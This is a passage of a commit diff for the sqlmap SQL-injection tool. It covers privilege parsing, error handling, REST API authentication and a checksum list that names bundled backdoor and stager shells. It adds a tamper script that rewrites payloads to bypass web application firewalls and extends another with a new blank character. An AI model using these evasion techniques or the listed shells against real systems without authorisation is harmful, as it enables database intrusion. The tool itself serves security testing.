for count in xrange(0, len(value or [])):
# The first column is always the username
if count == 0:
user = value[count]
@@ -424,12 +424,13 @@ class Users:
# In Firebird we get one letter for each privilege
elif Backend.isDbms(DBMS.FIREBIRD):
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
if privilege.strip() in FIREBIRD_PRIVS:
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
# In DB2 we get Y or G if the privilege is
# True, N otherwise
elif Backend.isDbms(DBMS.DB2):
privs = privilege.split(",")
privs = privilege.split(',')
privilege = privs[0]
if len(privs) > 1:
privs = privs[1]
@@ -537,8 +538,8 @@ class Users:
# In PostgreSQL we get 1 if the privilege is True,
# 0 otherwise
if Backend.isDbms(DBMS.PGSQL) and ", " in privilege:
privilege = privilege.replace(", ", ",")
privs = privilege.split(",")
privilege = privilege.replace(", ", ',')
privs = privilege.split(',')
i = 1
for priv in privs:
@@ -557,12 +558,12 @@ class Users:
# In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
privilege = privilege.replace(", ", ",")
privs = privilege.split(",")
privilege = privilege.replace(", ", ',')
privs = privilege.split(',')
i = 1
for priv in privs:
if priv.upper() == "Y":
if priv.upper() == 'Y':
for position, mysqlPriv in MYSQL_PRIVS.items():
if position == i:
privileges.add(mysqlPriv)
@@ -580,14 +581,14 @@ class Users:
# In DB2 we get Y or G if the privilege is
# True, N otherwise
elif Backend.isDbms(DBMS.DB2):
privs = privilege.split(",")
privs = privilege.split(',')
privilege = privs[0]
privs = privs[1]
privs = list(privs.strip())
i = 1
for priv in privs:
if priv.upper() in ("Y", "G"):
if priv.upper() in ('Y', 'G'):
for position, db2Priv in DB2_PRIVS.items():
if position == i:
privilege += ", " + db2Priv

3
sqlmap.conf
View File

@@ -674,6 +674,9 @@ binaryFields =
# Force character encoding used for data retrieval.
charset =
# Check Internet connection before assessing the target.
checkInternet = False
# Crawl the website starting from the target URL.
# Valid: integer
# Default: 0

33
sqlmap.py
View File

@@ -9,12 +9,16 @@ import sys
sys.dont_write_bytecode = True
__import__("lib.utils.versioncheck") # this has to be the first non-standard import
try:
__import__("lib.utils.versioncheck") # this has to be the first non-standard import
except ImportError:
exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
import bdb
import distutils
import glob
import inspect
import json
import logging
import os
import re
@@ -40,6 +44,7 @@ try:
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import maskSensitiveData
from lib.core.common import openFile
from lib.core.common import setPaths
from lib.core.common import weAreFrozen
from lib.core.data import cmdLineOptions
@@ -115,7 +120,6 @@ def main():
try:
checkEnvironment()
setPaths(modulePath())
banner()
@@ -123,7 +127,7 @@ def main():
cmdLineOptions.update(cmdLineParser().__dict__)
initOptions(cmdLineOptions)
if hasattr(conf, "api"):
if conf.get("api"):
# heavy imports
from lib.utils.api import StdDbOut
from lib.utils.api import setRestAPILog
@@ -203,9 +207,10 @@ def main():
print
errMsg = unhandledExceptionMessage()
excMsg = traceback.format_exc()
valid = checkIntegrity()
try:
if not checkIntegrity():
if valid is False:
errMsg = "code integrity check failed (turning off automatic issue creation). "
errMsg += "You should retrieve the latest development version from official GitHub "
errMsg += "repository at '%s'" % GIT_PAGE
@@ -214,7 +219,7 @@ def main():
dataToStdout(excMsg)
raise SystemExit
elif "tamper/" in excMsg:
elif any(_ in excMsg for _ in ("tamper/", "waf/")):
logger.critical(errMsg)
print
dataToStdout(excMsg)
@@ -260,6 +265,13 @@ def main():
logger.error(errMsg)
raise SystemExit
elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")):
errMsg = "there has been a problem in enumeration. "
errMsg += "Because of a considerable chance of false-positive case "
errMsg += "you are advised to rerun with switch '--flush-session'"
logger.error(errMsg)
raise SystemExit
elif all(_ in excMsg for _ in ("pymysql", "configparser")):
errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
logger.error(errMsg)
@@ -275,6 +287,9 @@ def main():
elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"):
raise SystemExit
elif any(_ in excMsg for _ in ("Broken pipe",)):
raise SystemExit
for match in re.finditer(r'File "(.+?)", line', excMsg):
file_ = match.group(1)
file_ = os.path.relpath(file_, os.path.dirname(__file__))
@@ -285,7 +300,7 @@ def main():
errMsg = maskSensitiveData(errMsg)
excMsg = maskSensitiveData(excMsg)
if hasattr(conf, "api"):
if conf.get("api") or not valid:
logger.critical("%s\n%s" % (errMsg, excMsg))
else:
logger.critical(errMsg)
@@ -320,13 +335,17 @@ def main():
except KeyboardInterrupt:
pass
if conf.get("harFile"):
with openFile(conf.harFile, "w+b") as f:
json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': '))
if cmdLineOptions.get("sqlmapShell"):
cmdLineOptions.clear()
conf.clear()
kb.clear()
main()
if hasattr(conf, "api"):
if conf.get("api"):
try:
conf.databaseCursor.disconnect()
except KeyboardInterrupt:

6
sqlmapapi.py
View File

@@ -40,13 +40,15 @@ def main():
apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store")
apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store")
apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store")
apiparser.add_option("--username", help="Basic authentication username (optional)", action="store")
apiparser.add_option("--password", help="Basic authentication password (optional)", action="store")
(args, _) = apiparser.parse_args()
# Start the client or the server
if args.server is True:
server(args.host, args.port, adapter=args.adapter)
server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password)
elif args.client is True:
client(args.host, args.port)
client(args.host, args.port, username=args.username, password=args.password)
else:
apiparser.print_help()

40
tamper/commentbeforeparentheses.py Normal file
View File

@@ -0,0 +1,40 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Prepends (inline) comment before parentheses
Tested against:
* Microsoft SQL Server
* MySQL
* Oracle
* PostgreSQL
Notes:
* Useful to bypass web application firewalls that block usage
of function calls
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
"""
retVal = payload
if payload:
retVal = re.sub(r"\b(\w+)\(", "\g<1>/**/(", retVal)
return retVal

5
tamper/space2mysqlblank.py
View File

@@ -33,7 +33,7 @@ def tamper(payload, **kwargs):
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Bid%0DFROM%0Cusers'
'SELECT%A0id%0BFROM%0Cusers'
"""
# ASCII table:
@@ -42,7 +42,8 @@ def tamper(payload, **kwargs):
# FF 0C new page
# CR 0D carriage return
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
blanks = ('%09', '%0A', '%0C', '%0D', '%0B')
# A0 non-breaking space
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
retVal = payload
if payload:

141
txt/checksum.md5
View File

@@ -8,7 +8,8 @@ acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_
2176d964f2d5ba2d871383d6a1868b8f extra/icmpsh/icmpsh_m.py
2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py
310efc965c862cfbd7b0da5150a5ad36 extra/__init__.py
c7973dc651586ba26d9553ad1ecfee74 extra/mssqlsig/update.py
f31ab783fd49a9e29ec34dd0a8e3873d extra/mssqlsig/update.py
ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_
310efc965c862cfbd7b0da5150a5ad36 extra/safe2bin/__init__.py
d3e99da5b5c2209e97836af9098124ee extra/safe2bin/safe2bin.py
d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_
@@ -16,101 +17,101 @@ d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_
c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_
3c07d5ecd7208748892c0459f6ca084a extra/shutils/duplicates.py
8cd064eea3506e5dd913e03171bc418f extra/shutils/pylint.py
02b87ce441efb4e9e6249237a6ce9655 extra/shutils/regressiontest.py
2b2aeec7b63d7e3b75940111b94db7b6 extra/shutils/regressiontest.py
310efc965c862cfbd7b0da5150a5ad36 extra/sqlharvest/__init__.py
7713aa366c983cdf1f3dbaa7383ea9e1 extra/sqlharvest/sqlharvest.py
5df358defc488bee9b40084892e3d1cb lib/controller/action.py
9cb94acd4c59822a5e1a258c4d1a4860 lib/controller/checks.py
dc386321e8813788f155dc557a78be8d lib/controller/controller.py
d79481ab99acd739615e747d4a79d9d0 lib/controller/handler.py
7afe836fd97271ccba67b4c0da2482ff lib/controller/action.py
5adb0a4ebf766a3cb9c3b1810b3e4b87 lib/controller/checks.py
a66093c734c7f94ecdf94d882c2d8b89 lib/controller/controller.py
35843d3e6dc4ea6c2462d48d2554ad10 lib/controller/handler.py
310efc965c862cfbd7b0da5150a5ad36 lib/controller/__init__.py
19905ecb4437b94512cf21d5f1720091 lib/core/agent.py
ca0a4eba91d73c9d7adedabf528ca4f1 lib/core/agent.py
6cc95a117fbd34ef31b9aa25520f0e31 lib/core/bigarray.py
145d131884dd5401d7a52effaea2ee9e lib/core/common.py
1f88ce54a27cb98c301ea0c3fb83bce0 lib/core/common.py
5065a4242a8cccf72f91e22e1007ae63 lib/core/convert.py
a8143dab9d3a27490f7d49b6b29ea530 lib/core/data.py
7936d78b1a7f1f008ff92bf2f88574ba lib/core/datatype.py
36c85e9ef109c5b4af3ca9bb1065ef1f lib/core/decorators.py
47eecd5499eaa15e931793e1d1ac3566 lib/core/defaults.py
4029f6869b36eb5f796c2bcc948f4fae lib/core/dicts.py
77edcfd3d7c5522bb64baf59ac23a047 lib/core/dump.py
2acf5449c71bfae4feec8da538e70116 lib/core/enums.py
9381a0c7e8bc19986299e84f4edda1a0 lib/core/exception.py
94b06df2dfd9f6c7a2ad3f04a846b686 lib/core/defaults.py
7309cf449b009723d1a4655fcf1a96d7 lib/core/dicts.py
65b9187de3d8c9c28ddab53ef2b399bc lib/core/dump.py
c8553b821a2089cb8ddd39ae661f25fc lib/core/enums.py
a44d7a4cc6c9a67a72d6af2f25f4ddac lib/core/exception.py
310efc965c862cfbd7b0da5150a5ad36 lib/core/__init__.py
9ba39bf66e9ecd469446bdbbeda906c3 lib/core/log.py
66c9795e2e7da32f46f04497ae910070 lib/core/optiondict.py
0324fce84ef88ed0416123f73c54a6d7 lib/core/option.py
5a34a1be62eab520cacc197b5eacda39 lib/core/optiondict.py
fbf750dc617c3549ee423d6c2334ba4d lib/core/option.py
5f2f56e6c5f274408df61943f1e080c0 lib/core/profiling.py
40be71cd774662a7b420caeb7051e7d5 lib/core/readlineng.py
d8e9250f3775119df07e9070eddccd16 lib/core/replication.py
785f86e3f963fa3798f84286a4e83ff2 lib/core/revision.py
40c80b28b3a5819b737a5a17d4565ae9 lib/core/session.py
50edc9861e7441371210f5fae263207c lib/core/settings.py
2a84a6aba8a3c553fdf6058a011a491f lib/core/settings.py
d91291997d2bd2f6028aaf371bf1d3b6 lib/core/shell.py
2ad85c130cc5f2b3701ea85c2f6bbf20 lib/core/subprocessng.py
afd0636d2e93c23f4f0a5c9b6023ea17 lib/core/target.py
85e3a98bc9ba62125baa13e864f37a3f lib/core/target.py
8970b88627902239d695280b1160e16c lib/core/testing.py
5521241c750855a4e44747fbac7771c6 lib/core/threads.py
40881e63d516d8304fc19971049cded0 lib/core/threads.py
ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
1f1fa616b5b19308d78c610ec8046399 lib/core/update.py
4d13ed693401a498b6d073a2a494bd83 lib/core/wordlist.py
310efc965c862cfbd7b0da5150a5ad36 lib/__init__.py
8c4b04062db2245d9e190b413985202a lib/parse/banner.py
54f06c50771ce894a3c6a418d545f4bf lib/parse/cmdline.py
457a8bd6e651f3db523e4c2c1207b447 lib/parse/cmdline.py
3a31657bc38f277d0016ff6d50bde61f lib/parse/configfile.py
14539f1be714d4f1ed042067d63bc50a lib/parse/handler.py
64e5bb3ecbdd75144500588b437ba8da lib/parse/headers.py
165dc27660c8559318009d44354f27cb lib/parse/html.py
310efc965c862cfbd7b0da5150a5ad36 lib/parse/__init__.py
0b010b7cdb2e42b5aa0caa59607279ad lib/parse/payloads.py
a0444cc351cd6d29015ad16d9eb46ff4 lib/parse/sitemap.py
997d0452e6fc22411f81a334511bcb3d lib/parse/sitemap.py
403d873f1d2fd0c7f73d83f104e41850 lib/request/basicauthhandler.py
0035612a620934d7ebe6d18426cfb065 lib/request/basic.py
3ba1c71e68953d34fc526a9d79d5a457 lib/request/basic.py
ef48de622b0a6b4a71df64b0d2785ef8 lib/request/comparison.py
74a2a83e3af11ab02088c79b6367ef29 lib/request/connect.py
e7ee2724486004129d4006f235b8556d lib/request/connect.py
fb6b788d0016ab4ec5e5f661f0f702ad lib/request/direct.py
cc1163d38e9b7ee5db2adac6784c02bb lib/request/dns.py
5dcdb37823a0b5eff65cd1018bcf09e4 lib/request/httpshandler.py
310efc965c862cfbd7b0da5150a5ad36 lib/request/__init__.py
e68e1f00c7bb47b2c4ea6201995c56fb lib/request/inject.py
f7660e11e23e977b00922e241b1a3000 lib/request/inject.py
dc1e0af84ee8eb421797d61c8cb8f172 lib/request/methodrequest.py
bb9c165b050f7696b089b96b5947fac3 lib/request/pkihandler.py
602d4338a9fceaaee40c601410d8ac0b lib/request/rangehandler.py
b581e0c5e27cd927883f2c7f1705bf4e lib/request/redirecthandler.py
20a0e6dac2edcf98fa8c47ee9a332c28 lib/request/templates.py
36518b36ae0cf199490457916a85b367 lib/takeover/abstraction.py
021a3bf20bcea047ab5601e8af736fee lib/request/redirecthandler.py
b373770137dc885889e495de95169b93 lib/request/templates.py
4f45a856e0273b9a8954a0e6b03d8eb5 lib/takeover/abstraction.py
c6bc7961a186baabe0a9f5b7e0d8974b lib/takeover/icmpsh.py
310efc965c862cfbd7b0da5150a5ad36 lib/takeover/__init__.py
c90c993b020a6ae0f0e497fd84f37466 lib/takeover/metasploit.py
ac541a0d38e4ecb4e41e97799a7235f4 lib/takeover/registry.py
4cd0322f22fbc26284cffa9f8f7545ef lib/takeover/udf.py
ab021269ad7f4d552025448ae08c51d0 lib/takeover/web.py
e5a82481947e798d0c11f3acf3e9db60 lib/takeover/xp_cmdshell.py
cae752650755c706272a45ae84519a4b lib/techniques/blind/inference.py
d466eab3ff82dbe29dc820e303eb4cff lib/takeover/udf.py
261c03b06ad74eb0b594c8ade5039bdc lib/takeover/web.py
604b087dc52dbcb4c3938ad1bf63829c lib/takeover/xp_cmdshell.py
201e7e69f9161dfa3aa10d83f690a488 lib/techniques/blind/inference.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/blind/__init__.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/brute/__init__.py
a693c023a9fed1eebb9ca9ef51e0aeb8 lib/techniques/brute/use.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/dns/__init__.py
ab1601a7f429b47637c4fb8af703d0f1 lib/techniques/dns/test.py
d3da4c7ceaf57c4687a052d58722f6bb lib/techniques/dns/use.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/error/__init__.py
2fb0eb698fc9d6e19960d2136bce787d lib/techniques/error/use.py
84b729215fd00e789ed75d9c00c97761 lib/techniques/error/use.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/__init__.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/union/__init__.py
19fd73af7a278fd72b46a5a60f5bdd09 lib/techniques/union/test.py
8cd5655c60a638caa30ca1220896aeda lib/techniques/union/use.py
b8c9bbf1a50f1b2fdd0d3644922e252a lib/utils/api.py
29e32d59fcdd63c5a13498af1f367c8c lib/utils/crawler.py
d71e48e6fd08f75cc612bf8b260994ce lib/techniques/union/test.py
db3090ff9a740ba096ba676fcf44ebfc lib/techniques/union/use.py
720e899d5097d701d258bdc30eb8aa51 lib/utils/api.py
7d10ba0851da8ee9cd3c140dcd18798e lib/utils/brute.py
c08d2487a53a1db8170178ebcf87c864 lib/utils/crawler.py
ba12c69a90061aa14d848b8396e79191 lib/utils/deps.py
3b9fd519164e0bf275d5fd361c3f11ff lib/utils/getch.py
fee8a47fdbd3b2fe93a5afade80e68e7 lib/utils/har.py
ccfdad414ce2ec0c394c3deaa39a82bf lib/utils/hashdb.py
aff7355d582fc6c00a675eeee2a5217a lib/utils/hash.py
12e0e0ab70c6fe5786bc561c35dc067f lib/utils/hash.py
e76a08237ee6a4cd6855af79610ea8a5 lib/utils/htmlentities.py
310efc965c862cfbd7b0da5150a5ad36 lib/utils/__init__.py
9d8c858417d356e49e1959ba253aede4 lib/utils/pivotdumptable.py
8520a745c9b4db3814fe46f4c34c6fbc lib/utils/progress.py
2c3638d499f3c01c34187e531f77d004 lib/utils/purge.py
2da1b35339667646e51101adaa1dfc32 lib/utils/search.py
4bd7dd4fc8f299f1566a26ed6c2cefb5 lib/utils/search.py
569521a83b2b6c62497879267b963b21 lib/utils/sqlalchemy.py
caeea96ec9c9d489f615f282259b32ca lib/utils/timeout.py
6fa36b9742293756b226cddee11b7d52 lib/utils/versioncheck.py
@@ -132,14 +133,14 @@ ce8bc86383f2ade41e08f2dbee1844bf plugins/dbms/db2/syntax.py
b8dcd6e97166f58ee452e68c46bfe2c4 plugins/dbms/firebird/connector.py
147afe5f4a3d09548a8a1dbc954fe29e plugins/dbms/firebird/enumeration.py
4e421504f59861bf1ed1a89abda583d1 plugins/dbms/firebird/filesystem.py
bbd239cd27b35c2fbd29443f0af5d973 plugins/dbms/firebird/fingerprint.py
d5d19126fec00967932dc75fe7880d6d plugins/dbms/firebird/fingerprint.py
f86ace7fcaea5ff3f9e86ab2dce052c5 plugins/dbms/firebird/__init__.py
04f7c2977ab5198c6f4aa6233b872ae0 plugins/dbms/firebird/syntax.py
1cb1ab93e4b8c97e81586acfe4d030a2 plugins/dbms/firebird/takeover.py
3a97bd07cce66bc812309341e7b54697 plugins/dbms/hsqldb/connector.py
015281fb8f96dbade0d2e30fc8da9c4c plugins/dbms/hsqldb/enumeration.py
6d76854ebce4cad900b47a124a1867a9 plugins/dbms/hsqldb/enumeration.py
c0b14e62e1ecbb679569a1abb9cf1913 plugins/dbms/hsqldb/filesystem.py
82304c5d7b06bb564dcdd8cda84dbeae plugins/dbms/hsqldb/fingerprint.py
cf5681143cd900fdf198ecd574842ecb plugins/dbms/hsqldb/fingerprint.py
0b18e3cf582b128cf9f16ee34ef85727 plugins/dbms/hsqldb/__init__.py
65e8f8edc9d18fe482deb474a29f83ff plugins/dbms/hsqldb/syntax.py
0a1584e2b01f33abe3ef91d99bafbd3f plugins/dbms/hsqldb/takeover.py
@@ -152,28 +153,28 @@ f06d263b2c9b52ea7a120593eb5806c4 plugins/dbms/informix/fingerprint.py
744fb5044f2b9f9d5ebda6e3f08e3be7 plugins/dbms/informix/takeover.py
310efc965c862cfbd7b0da5150a5ad36 plugins/dbms/__init__.py
e50b624ff23c3e180d80e065deb1763f plugins/dbms/maxdb/connector.py
cbd90f22ce862409fe392e65f0ea94ac plugins/dbms/maxdb/enumeration.py
affabeab69a2c5d4fc66f84b5aeaf24a plugins/dbms/maxdb/enumeration.py
815ea8e7b9bd714d73d9d6c454aff774 plugins/dbms/maxdb/filesystem.py
017c723354eff28188773670d3837c01 plugins/dbms/maxdb/fingerprint.py
c03001c1f70e76de39d26241dfcbd033 plugins/dbms/maxdb/__init__.py
e6036f5b2e39aec37ba036a8cf0efd6f plugins/dbms/maxdb/syntax.py
0be362015605e26551e5d79cc83ed466 plugins/dbms/maxdb/takeover.py
e3e78fab9b5eb97867699f0b20e59b62 plugins/dbms/mssqlserver/connector.py
a7ed0510e47384eaf93164d53e2b6b36 plugins/dbms/mssqlserver/enumeration.py
8554437c437052c30237be170ba8ce3a plugins/dbms/mssqlserver/filesystem.py
13cb15e8abfb05818e6f66c687b78664 plugins/dbms/mssqlserver/fingerprint.py
b8de437eaa3e05c3db666968b7d142e4 plugins/dbms/mssqlserver/enumeration.py
5de6074ee2f7dc5b04b70307d36dbe1d plugins/dbms/mssqlserver/filesystem.py
5207943c31e166a70d5fc7cec8b5ef18 plugins/dbms/mssqlserver/fingerprint.py
40bd890988f9acd3942255d687445371 plugins/dbms/mssqlserver/__init__.py
400ce654ff6bc57a40fb291322a18282 plugins/dbms/mssqlserver/syntax.py
20c669e084ea4d6b968a5834f7fec66c plugins/dbms/mssqlserver/takeover.py
48fb283a0dbf980495ca054f7b55783f plugins/dbms/mysql/connector.py
ad5bf4677e8e5c9cadf26cb4c8190543 plugins/dbms/mysql/connector.py
7fe94b803fa273baf479b76ce7a3fb51 plugins/dbms/mysql/enumeration.py
1bd5e659962e814b66a451b807de9110 plugins/dbms/mysql/filesystem.py
1a17c2dea2cd7554cf9082fdf96f8360 plugins/dbms/mysql/fingerprint.py
e43fda42decf2a70bad470b884674fbe plugins/dbms/mysql/fingerprint.py
42568a66a13a43ed46748290c503a652 plugins/dbms/mysql/__init__.py
96dfafcc4aecc1c574148ac05dbdb6da plugins/dbms/mysql/syntax.py
33b2dc28075ab560fd8a4dc898682a0d plugins/dbms/mysql/takeover.py
ea4b9cd238075b79945bd2607810934a plugins/dbms/oracle/connector.py
3a08ef0037de6df9f9a92ec5b126d705 plugins/dbms/oracle/enumeration.py
0471e3bf8310064e28e7c36064056e8d plugins/dbms/oracle/enumeration.py
dc5962a1d4d69d4206b6c03e00e7f33d plugins/dbms/oracle/filesystem.py
525381f48505095b14e567c1f59ca9c7 plugins/dbms/oracle/fingerprint.py
25a99a9dd7072b6b7346438599c78050 plugins/dbms/oracle/__init__.py
@@ -194,37 +195,36 @@ ee430d142fa8f9ee571578d0a0916679 plugins/dbms/sqlite/fingerprint.py
4827722159a89652005f49265bb55c43 plugins/dbms/sqlite/syntax.py
02ab8ff465da9dd31ffe6a963c676180 plugins/dbms/sqlite/takeover.py
e3e78fab9b5eb97867699f0b20e59b62 plugins/dbms/sybase/connector.py
a7f4d3a194f52fbb4fb4488be41273b1 plugins/dbms/sybase/enumeration.py
e98b82180be4fc5bbf4dfe7247afcbfe plugins/dbms/sybase/enumeration.py
62d772c7cd08275e3503304ba90c4e8a plugins/dbms/sybase/filesystem.py
deed74334b637767fc9de8f74b37647a plugins/dbms/sybase/fingerprint.py
45436a42c2bb8075e1482a950d993d55 plugins/dbms/sybase/__init__.py
89412a921c8c598c19d36762d5820f05 plugins/dbms/sybase/syntax.py
654cd5e69cf5e5c644bfa5d284e61206 plugins/dbms/sybase/takeover.py
be7481a96214220bcd8f51ca00239bed plugins/generic/connector.py
a8f9d0516509e9e4226516ab4f13036a plugins/generic/custom.py
3b54fd65feb9f70c551d315e82653384 plugins/generic/databases.py
f7387352380136ac05c0bc3decb85638 plugins/generic/entries.py
f700954549ad8ebf77f5187262fb9af0 plugins/generic/connector.py
5390591ca955036d492de11355b52e8f plugins/generic/custom.py
4ad4bccc03256b8f3d21ba4f8f759404 plugins/generic/databases.py
106f19c1d895963e2efa8ee193a537ec plugins/generic/entries.py
55802d1d5d65938414c77ccc27731cab plugins/generic/enumeration.py
bc32b21a3ab5421b5307ff7317256229 plugins/generic/filesystem.py
feca57a968c528a2fe3ccafbc83a17f8 plugins/generic/fingerprint.py
0d10a0410c416fece51c26a935e68568 plugins/generic/filesystem.py
2e397afd83939889d1a7a07893b19ae7 plugins/generic/fingerprint.py
310efc965c862cfbd7b0da5150a5ad36 plugins/generic/__init__.py
8fd5913823e97e21a8eea717cd12fc96 plugins/generic/misc.py
64b052d1df6d7fe34d73b51196f68ae3 plugins/generic/search.py
dca509ef83bf7d74ad26ebe4a03e4c6a plugins/generic/syntax.py
25cc2788cc3da6f8a0bcff0e41ff586e plugins/generic/takeover.py
02c8da99874f1cfd869d9e3bbb7c84e6 plugins/generic/users.py
84c16ffdf7047831355d1ecc09060e59 plugins/generic/misc.py
070f58c52e2a04e7a9896b42b2d17dc2 plugins/generic/search.py
562cfa80a15d5f7f1d52e10c5736d7e2 plugins/generic/syntax.py
fca9946e960942cc9b22ef26e12b8b3a plugins/generic/takeover.py
f97b84b8dcbe80b2d86bc26829aed23b plugins/generic/users.py
310efc965c862cfbd7b0da5150a5ad36 plugins/__init__.py
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
1add5a9a67539e7fd1999c8c20a69d15 shell/backdoor.jsp_
09fc3ed6543f4d1885e338b271e5e97a shell/backdoor.php_
ff90cb0366f7cefbdd6e573e27e6238c shell/runcmd.exe_
0e7aba05423c272f051f31165b0e416d shell/stager.asp_
c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
01e3505e796edf19aad6a996101c81c9 shell/stager.php_
0751a45ac4c130131f2cdb74d866b664 sqlmapapi.py
dee6a537359c049dabe4ffe3de881359 sqlmap.py
8755985bcb91e3fea7aaaea3e98ec2dc sqlmapapi.py
41a637eda3e182d520fa4fb435edc1ec sqlmap.py
08c711a470d7e0bf705320ba3c48b886 tamper/apostrophemask.py
e8509df10d3f1c28014d7825562d32dd tamper/apostrophenullencode.py
bb27f7dc980ea07fcfedbd7da5e5e029 tamper/appendnullbyte.py
@@ -236,6 +236,7 @@ e6e3ae32bc3c3d5acb4b93289e3fe698 tamper/bluecoat.py
893e7d907bcd370394b70a30d502be2b tamper/charunicodeencode.py
596883203fbdd81ee760e4a00071bf39 tamper/commalesslimit.py
f341a48112354a50347546fa73f4f531 tamper/commalessmid.py
1a368a32530c04a11a531cd21d587682 tamper/commentbeforeparentheses.py
28c21fd9c9801d398698c646bb894260 tamper/concat2concatws.py
d496b8abd40ea1a86c771d9d20174f61 tamper/equaltolike.py
fb3c31b72675f6ef27fa420a4e974a55 tamper/escapequotes.py
@@ -264,7 +265,7 @@ b2331640743170f82be9a8c27f65b206 tamper/space2morecomment.py
507a174c64345df8df003ddba93c8cd1 tamper/space2morehash.py
0ce89b0d602abbd64344ab038be8acbc tamper/space2mssqlblank.py
fa66af20648b5538289748abe7a08fe6 tamper/space2mssqlhash.py
ca7597ba264ec731b8a73e9cad5334eb tamper/space2mysqlblank.py
b5abc11a45e9646cd0e296548c42e787 tamper/space2mysqlblank.py
038b8ea90f9a3a45b9bc67fcdff38511 tamper/space2mysqldash.py
5665c217ef8998bfd18f9ef1d8c617bd tamper/space2plus.py
a30fa43203d960c7a9d8709bf24ca401 tamper/space2randomblank.py
@@ -388,7 +389,7 @@ a0200fc79bae0ec597b98c82894562a5 waf/armor.py
d764bf3b9456a02a7f8a0149a93ff950 waf/aws.py
dbc89fc642074c6d17a04532e623f976 waf/baidu.py
e4e713cc4e5504eed0311fa62b05a6f9 waf/barracuda.py
8a6f2edc3ff9c031e2b58733ee76cfa0 waf/bigip.py
81af1707c0783d205075d887c9868043 waf/bigip.py
2adee01cbf513944cd3d281af1c05a86 waf/binarysec.py
db312318ee5309577917faca1cd2c077 waf/blockdos.py
520ef7b59340b96b4a43e7fdba760967 waf/ciscoacexml.py
@@ -401,14 +402,14 @@ ab6f6e3169cb43efcf5b6ed84b58252f waf/comodo.py
e4b058d759198216d24f8fed6ef97be4 waf/edgecast.py
f633953970fb181b9ac5420a47e6a610 waf/expressionengine.py
1df78b6ad49259514cb6e4d68371cbcf waf/fortiweb.py
ef151fbc34f16620958ba61dd415ae59 waf/generic.py
a63bc52b39a7fac38a8a3adee1545851 waf/generic.py
d50e17ed49e1a3cb846e652ed98e3b3c waf/hyperguard.py
5b5382ccfb82ee6afdc1b47c8a4bce70 waf/incapsula.py
310efc965c862cfbd7b0da5150a5ad36 waf/__init__.py
5a364b68519a5872c4d60be11d2a23c1 waf/isaserver.py
8bfbae2b692538da0fb1a812330b2649 waf/jiasule.py
0b50798c12802bf98a850dd716b0d96d waf/knownsec.py
6d47157944211d758483ff8f97b810e8 waf/kona.py
bb4177a5a1b4a8d590bf556b409625ac waf/kona.py
4fed33de1ffb2214bc1baa9f925c3eb9 waf/modsecurity.py
fe690dfc4b2825c3682ceecef7ee9e6e waf/netcontinuum.py
bd55ed30291b31db63b761db472f41ea waf/netscaler.py
@@ -428,7 +429,7 @@ d4fbb2af37ad3ade3118668f2b516693 waf/requestvalidationmode.py
c1062e5c165cdaeca51113e60973afb2 waf/sophos.py
e909c359a9181e64271e6c7c8347fe15 waf/stingray.py
33f3bdac403519a1f96fb9015680c575 waf/sucuri.py
507f7c1019afd1c45c76bbcd179ddfe9 waf/tencent.py
c863940e74f8ecab70a80bb62548b130 waf/tencent.py
3de96df7edeae2f21ba7b9d77c90f4d6 waf/teros.py
d428df1e83a6fac9d8dbc90d6b5dab20 waf/trafficshield.py
385c84908b482c7f0fe93262ab5320fa waf/urlscan.py
@@ -459,4 +460,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
5bd467d86d7cb55fbe5f66e4ff9a6bec xml/queries.xml
8f984712da3f23f105fc0b3391114e4b xml/queries.xml

752
